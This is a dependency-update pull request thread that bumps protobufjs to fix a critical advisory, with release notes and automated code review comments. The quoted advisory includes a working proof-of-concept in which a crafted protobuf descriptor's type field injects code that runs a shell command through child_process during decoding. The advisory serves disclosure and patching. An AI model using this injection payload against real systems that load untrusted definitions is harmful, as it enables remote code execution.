fix(deps): update dependency protobufjs to v7.5.5 [security]

[renovate-bot]

This PR contains the following updates:

Package	Change	Age	Confidence
protobufjs (source)	7.4.0 → 7.5.5
protobufjs (source)	~7.4.0 → ~7.5.5
protobufjs (source)	7.2.4 - 7.5.0 → 7.5.5 7.5.5
protobufjs (source)	7.5.4 → 7.5.5

GitHub Vulnerability Alerts

GHSA-xq3m-2v4x-88gg

Summary

protobufjs compiles protobuf definitions into JS functions. Attackers can manipulate these definitions to execute arbitrary JS code.

Details

Attackers can inject arbitrary code in the "type" fields of protobuf definitions, which will then execute during object decoding using that definition.

PoC

const protobuf = require('protobufjs');
maliciousDescriptor = JSON.parse(`{"nested":{"User":{"fields":{"id":{"type":"int32","id":1},"data":{"type":"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X","id":2}}},"Data(){console.log(process.mainModule.require('child_process').execSync('id').toString())};\\nfunction X":{"fields":{"content":{"type":"string","id":1}}}}}`)
const root = protobuf.Root.fromJSON(maliciousDescriptor);
const UserType = root.lookupType("User");
const userBytes = Buffer.from([0x08, 0x01, 0x12, 0x07, 0x0a, 0x05, 0x68, 0x65, 0x6c, 0x6c, 0x6f]);
try {
    const user = UserType.decode(userBytes);
} catch (e) {}

Impact

Remote code execution when attackers can control the protobuf definition files.

Severity

• CVSS Score: 9.4 / 10 (Critical)
• Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

---

Release Notes

protobufjs/protobuf.js (protobufjs)

v7.5.5

Compare Source

v7.5.4

Compare Source

Bug Fixes

• invalid syntax in descriptor.proto (#​2092) (5a3769a)

v7.5.3

Compare Source

Bug Fixes

• descriptor extensions handling post-editions (#​2075) (6e255d4)

v7.5.2

Compare Source

Bug Fixes

• ensure that types are always resolved (#​2068) (4b51cb2)

v7.5.1

Compare Source

Bug Fixes

• optimize regressions from editions implementations (#​2066) (6406d4c)
• reserved field inside group blocks fail parsing (#​2058) (56782bf)

v7.5.0

Compare Source

Features

• add Edition 2023 Support (f04ded3)
• add Edition 2023 Support (ac9a3b9)
• add Edition 2023 Support (e5ca5c8)
• add Edition 2023 Support (a84409b)
• add Edition 2023 Support (9c5a178)
• add Edition 2023 Support (b2c6867)
• add Edition 2023 Support (60f3e51)
• add Edition 2023 Support (a656361)
• add Edition 2023 Support (869a95b)
• add Edition 2023 Support (b936af4)
• add Edition 2023 Support (a938467)
• add Edition 2023 Support (1af8454)
• add Edition 2023 Support (785416f)
• add feature resolution (a9ffc8a)
• add feature resolution and tests (68b5339)
• add feature resolution for protobuf editions (547afa2)
• add feature resolution for protobuf editions (65d3ed1)
• api_converters_editions tests added and run successfully" (b4b5ca4)
• increase size of file that protobufjs CLI can process (00d5f1a)
• increase size of file that protobufjs CLI can process (d36ef0f)

Bug Fixes

• change tree traversal order and feature resolution algorithm (d2d47d9)
• remove eval usage so that chrome extension MV3 can run properly (#​1941) (f2ccb99)

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[dpebot]

/gcbrun

[gemini-code-assist]

Code Review

This pull request updates the protobufjs dependency to version 7.5.5 across multiple packages to address a security vulnerability. Feedback includes correcting an invalid semver range in handwritten/bigquery-storage/package.json, addressing a remaining nested vulnerable version of protobufjs in the package-lock.json, and investigating a suspicious version update for @types/node in the yarn.lock file.

[gemini-code-assist]

The peer dependency range "7.5.5 7.5.5" is invalid semver syntax. It appears to be a typo introduced during the automated update process. It should be corrected to a valid version or range, such as "7.5.5" or "^7.5.5".

Suggested change

	"protobufjs": "7.5.5 7.5.5"
	"protobufjs": "7.5.5"

[gemini-code-assist]

This PR is intended to resolve a security vulnerability (GHSA-xq3m-2v4x-88gg) by updating protobufjs to 7.5.5. However, this change introduces a nested dependency on version 7.5.4 for google-proto-files. Since 7.5.4 is still vulnerable, it should be updated to 7.5.5 to ensure the security fix is applied throughout the dependency tree.

Suggested change

	"version": "7.5.4",
	"resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.4.tgz",
	"integrity": "sha512-CvexbZtbov6jW2eXAvLukXjXUW1TzFaivC46BpWc/3BpcCysb5Vffu+B3XHMm8lVEuy2Mm4XGex8hBSg1yapPg==",
	"version": "7.5.5",
	"resolved": "https://registry.npmjs.org/protobufjs/-/protobufjs-7.5.5.tgz",
	"integrity": "sha512-3wY1AxV+VBNW8Yypfd1yQY9pXnqTAN+KwQxL8iYm3/BjKYMNg4i0owhEe26PWDOMaIrzeeF98Lqd5NGz4omiIg==",

[gemini-code-assist]

The version for @types/node is being set to 25.6.0. This appears to be an incorrect or non-existent version, as stable versions of Node.js and its corresponding types are currently in the 22.x range. This could lead to build failures or type inconsistencies.

[dpebot]

/gcbrun

[dpebot]

/gcbrun

[dpebot]

/gcbrun

[dpebot]

/gcbrun